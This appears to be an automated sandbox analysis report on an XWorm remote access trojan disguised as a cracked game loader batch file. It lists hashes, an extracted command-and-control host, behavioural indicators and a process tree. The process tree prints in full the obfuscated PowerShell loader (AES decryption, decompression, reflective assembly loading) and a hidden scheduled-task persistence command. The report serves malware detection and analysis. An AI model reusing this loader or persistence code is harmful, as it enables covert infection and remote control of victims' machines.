xworm | 94bf91b3fb8d81ca10883351d514dd89c9f953771ec90a2c3571e586c0ece07a

Analysis

max time kernel
122s
max time network
118s
platform
windows11-21h2_x64
resource
win11-20250218-en
resource tags

arch:x64arch:x86image:win11-20250218-enlocale:en-usos:windows11-21h2-x64system
submitted
03/03/2025, 19:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Destiny Loader Cracked.bat
Size

327KB
MD5

d0eef460c098ddfab73bffe09b5576f1
SHA1

72a9d083d85037abf060c027ceb2f4c7d83b8d42
SHA256

94bf91b3fb8d81ca10883351d514dd89c9f953771ec90a2c3571e586c0ece07a
SHA512

eaf4b8a20787685ac516f8c8fa27052df7e8100180cdbb16fdbc1dcdc33ede7623ed1ce1abbd24146bc2dc63c4e55fb36957dc731b005d71fd781e1a1b72e8d3
SSDEEP

6144:fS/P9VWTPTlLWWUY+GVH0I2mjYTNZTNSq78e89aOki5M:YP/2PTlLVUI2mMTTn8e89Ii5M

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

ciad4zftx.localto.net:6536

Mutex

fz5G9hEIprTL3zDO

Attributes

Install_directory
%ProgramData%
install_file
System.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/5280-49-0x0000026A6E830000-0x0000026A6E84A000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
14	5280	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5720	powershell.exe
5748	powershell.exe
5280	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\metadata	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\settings.dat	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133855034988699744"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
5720	powershell.exe
5720	powershell.exe
5720	powershell.exe
5748	powershell.exe
5748	powershell.exe
5748	powershell.exe
5280	powershell.exe
5280	powershell.exe
5280	powershell.exe
3856	chrome.exe
3856	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5720	powershell.exe
Token: SeDebugPrivilege	5748	powershell.exe
Token: SeIncreaseQuotaPrivilege	5748	powershell.exe
Token: SeSecurityPrivilege	5748	powershell.exe
Token: SeTakeOwnershipPrivilege	5748	powershell.exe
Token: SeLoadDriverPrivilege	5748	powershell.exe
Token: SeSystemProfilePrivilege	5748	powershell.exe
Token: SeSystemtimePrivilege	5748	powershell.exe
Token: SeProfSingleProcessPrivilege	5748	powershell.exe
Token: SeIncBasePriorityPrivilege	5748	powershell.exe
Token: SeCreatePagefilePrivilege	5748	powershell.exe
Token: SeBackupPrivilege	5748	powershell.exe
Token: SeRestorePrivilege	5748	powershell.exe
Token: SeShutdownPrivilege	5748	powershell.exe
Token: SeDebugPrivilege	5748	powershell.exe
Token: SeSystemEnvironmentPrivilege	5748	powershell.exe
Token: SeRemoteShutdownPrivilege	5748	powershell.exe
Token: SeUndockPrivilege	5748	powershell.exe
Token: SeManageVolumePrivilege	5748	powershell.exe
Token: 33	5748	powershell.exe
Token: 34	5748	powershell.exe
Token: 35	5748	powershell.exe
Token: 36	5748	powershell.exe
Token: SeIncreaseQuotaPrivilege	5748	powershell.exe
Token: SeSecurityPrivilege	5748	powershell.exe
Token: SeTakeOwnershipPrivilege	5748	powershell.exe
Token: SeLoadDriverPrivilege	5748	powershell.exe
Token: SeSystemProfilePrivilege	5748	powershell.exe
Token: SeSystemtimePrivilege	5748	powershell.exe
Token: SeProfSingleProcessPrivilege	5748	powershell.exe
Token: SeIncBasePriorityPrivilege	5748	powershell.exe
Token: SeCreatePagefilePrivilege	5748	powershell.exe
Token: SeBackupPrivilege	5748	powershell.exe
Token: SeRestorePrivilege	5748	powershell.exe
Token: SeShutdownPrivilege	5748	powershell.exe
Token: SeDebugPrivilege	5748	powershell.exe
Token: SeSystemEnvironmentPrivilege	5748	powershell.exe
Token: SeRemoteShutdownPrivilege	5748	powershell.exe
Token: SeUndockPrivilege	5748	powershell.exe
Token: SeManageVolumePrivilege	5748	powershell.exe
Token: 33	5748	powershell.exe
Token: 34	5748	powershell.exe
Token: 35	5748	powershell.exe
Token: 36	5748	powershell.exe
Token: SeIncreaseQuotaPrivilege	5748	powershell.exe
Token: SeSecurityPrivilege	5748	powershell.exe
Token: SeTakeOwnershipPrivilege	5748	powershell.exe
Token: SeLoadDriverPrivilege	5748	powershell.exe
Token: SeSystemProfilePrivilege	5748	powershell.exe
Token: SeSystemtimePrivilege	5748	powershell.exe
Token: SeProfSingleProcessPrivilege	5748	powershell.exe
Token: SeIncBasePriorityPrivilege	5748	powershell.exe
Token: SeCreatePagefilePrivilege	5748	powershell.exe
Token: SeBackupPrivilege	5748	powershell.exe
Token: SeRestorePrivilege	5748	powershell.exe
Token: SeShutdownPrivilege	5748	powershell.exe
Token: SeDebugPrivilege	5748	powershell.exe
Token: SeSystemEnvironmentPrivilege	5748	powershell.exe
Token: SeRemoteShutdownPrivilege	5748	powershell.exe
Token: SeUndockPrivilege	5748	powershell.exe
Token: SeManageVolumePrivilege	5748	powershell.exe
Token: 33	5748	powershell.exe
Token: 34	5748	powershell.exe
Token: 35	5748	powershell.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe
3856	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3256 wrote to memory of 5720	3256	cmd.exe	90
PID 3256 wrote to memory of 5720	3256	cmd.exe	90
PID 5720 wrote to memory of 5748	5720	powershell.exe	92
PID 5720 wrote to memory of 5748	5720	powershell.exe	92
PID 5720 wrote to memory of 128	5720	powershell.exe	96
PID 5720 wrote to memory of 128	5720	powershell.exe	96
PID 128 wrote to memory of 3932	128	WScript.exe	97
PID 128 wrote to memory of 3932	128	WScript.exe	97
PID 3932 wrote to memory of 5280	3932	cmd.exe	99
PID 3932 wrote to memory of 5280	3932	cmd.exe	99
PID 3856 wrote to memory of 3620	3856	chrome.exe	106
PID 3856 wrote to memory of 3620	3856	chrome.exe	106
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 1800	3856	chrome.exe	107
PID 3856 wrote to memory of 3548	3856	chrome.exe	108
PID 3856 wrote to memory of 3548	3856	chrome.exe	108
PID 3856 wrote to memory of 2200	3856	chrome.exe	109
PID 3856 wrote to memory of 2200	3856	chrome.exe	109
PID 3856 wrote to memory of 2200	3856	chrome.exe	109
PID 3856 wrote to memory of 2200	3856	chrome.exe	109
PID 3856 wrote to memory of 2200	3856	chrome.exe	109
PID 3856 wrote to memory of 2200	3856	chrome.exe	109
PID 3856 wrote to memory of 2200	3856	chrome.exe	109
PID 3856 wrote to memory of 2200	3856	chrome.exe	109
PID 3856 wrote to memory of 2200	3856	chrome.exe	109
PID 3856 wrote to memory of 2200	3856	chrome.exe	109
PID 3856 wrote to memory of 2200	3856	chrome.exe	109
PID 3856 wrote to memory of 2200	3856	chrome.exe	109
PID 3856 wrote to memory of 2200	3856	chrome.exe	109
PID 3856 wrote to memory of 2200	3856	chrome.exe	109
PID 3856 wrote to memory of 2200	3856	chrome.exe	109
PID 3856 wrote to memory of 2200	3856	chrome.exe	109
PID 3856 wrote to memory of 2200	3856	chrome.exe	109
PID 3856 wrote to memory of 2200	3856	chrome.exe	109
PID 3856 wrote to memory of 2200	3856	chrome.exe	109
PID 3856 wrote to memory of 2200	3856	chrome.exe	109

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Destiny Loader Cracked.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3256
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('St/Wt6vqm9kaTmxnEI7FVwFJ79tdiegvPTsnH2ymwRU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cXqlF3UWhJzCcuDvG48+Og=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rsudL=New-Object System.IO.MemoryStream(,$param_var); $nFnkD=New-Object System.IO.MemoryStream; $wnAvt=New-Object System.IO.Compression.GZipStream($rsudL, [IO.Compression.CompressionMode]::Decompress); $wnAvt.CopyTo($nFnkD); $wnAvt.Dispose(); $rsudL.Dispose(); $nFnkD.Dispose(); $nFnkD.ToArray();}function execute_function($param_var,$param2_var){ $lNmdI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CXjmD=$lNmdI.EntryPoint; $CXjmD.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Destiny Loader Cracked.bat';$iYYFP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Destiny Loader Cracked.bat').Split([Environment]::NewLine);foreach ($DzSDP in $iYYFP) { if ($DzSDP.StartsWith(':: ')) { $HXwqb=$DzSDP.Substring(3); break; }}$payloads_var=[string[]]$HXwqb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5720
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_589_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_589.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5748
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_589.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:128
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_589.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3932
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('St/Wt6vqm9kaTmxnEI7FVwFJ79tdiegvPTsnH2ymwRU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cXqlF3UWhJzCcuDvG48+Og=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rsudL=New-Object System.IO.MemoryStream(,$param_var); $nFnkD=New-Object System.IO.MemoryStream; $wnAvt=New-Object System.IO.Compression.GZipStream($rsudL, [IO.Compression.CompressionMode]::Decompress); $wnAvt.CopyTo($nFnkD); $wnAvt.Dispose(); $rsudL.Dispose(); $nFnkD.Dispose(); $nFnkD.ToArray();}function execute_function($param_var,$param2_var){ $lNmdI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CXjmD=$lNmdI.EntryPoint; $CXjmD.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_589.bat';$iYYFP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_589.bat').Split([Environment]::NewLine);foreach ($DzSDP in $iYYFP) { if ($DzSDP.StartsWith(':: ')) { $HXwqb=$DzSDP.Substring(3); break; }}$payloads_var=[string[]]$HXwqb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5280

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=3820,i,8425512666034524542,4476834323552806530,262144 --variations-seed-version --mojo-platform-channel-handle=4764 /prefetch:14
1⤵
PID:5784

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xe8,0x108,0x7fff3e1ecc40,0x7fff3e1ecc4c,0x7fff3e1ecc58
  2⤵
  PID:3620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1812,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=1816 /prefetch:2
  2⤵
  PID:1800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1864,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=1876 /prefetch:3
  2⤵
  PID:3548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2192,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=2360 /prefetch:8
  2⤵
  PID:2200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3064,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=3140 /prefetch:1
  2⤵
  PID:3148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3120,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=3320 /prefetch:1
  2⤵
  PID:3364
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4420,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4428 /prefetch:1
  2⤵
  PID:1980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4568,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4600 /prefetch:8
  2⤵
  PID:4768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4736,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4748 /prefetch:8
  2⤵
  PID:2464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4732,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4912 /prefetch:8
  2⤵
  PID:3296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4788,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4852 /prefetch:8
  2⤵
  PID:5544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4944,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4760 /prefetch:8
  2⤵
  PID:6128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5112,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4936 /prefetch:8
  2⤵
  PID:5428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5024,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4608 /prefetch:8
  2⤵
  PID:4532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5176,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5200 /prefetch:8
  2⤵
  PID:764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4936,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5316 /prefetch:2
  2⤵
  PID:5532
- C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  - Drops file in Windows directory
  PID:1544
- - C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff6b64d4698,0x7ff6b64d46a4,0x7ff6b64d46b0
    3⤵
    - Drops file in Windows directory
    PID:1924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4916,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4832 /prefetch:8
  2⤵
  PID:1580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4604,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5452 /prefetch:8
  2⤵
  PID:892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=4632,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5276 /prefetch:2
  2⤵
  PID:4940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=4608,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5632 /prefetch:1
  2⤵
  PID:3160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=4636,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=3308 /prefetch:1
  2⤵
  PID:3920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5092,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5220 /prefetch:1
  2⤵
  PID:1620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=3488,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4400 /prefetch:1
  2⤵
  PID:4272
- C:\Program Files\Google\Chrome\Application\chrome.exe
